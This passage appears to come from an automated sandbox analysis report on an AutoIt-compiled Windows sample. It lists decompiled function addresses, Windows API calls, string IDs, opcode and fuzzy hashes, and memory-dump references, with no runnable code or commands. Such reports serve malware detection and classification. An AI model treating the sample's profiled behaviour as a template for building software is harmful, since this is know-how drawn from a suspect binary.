                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freeptd.LIBCMT ref: 0041516B
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00415173
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1454798553-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strncmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Q\E
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 909875538-2189900498
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2652923123-3941886329
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                                                                                                                                                                                                                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: LPT
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3035604524-1350329615
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: &
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2931989736-1010288
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00466825
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: |
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: '
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                                                                                                                                                                                                                                                                                                                                • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove$_sprintf_strlen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %02X
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1921645428-436463671
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Combobox
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
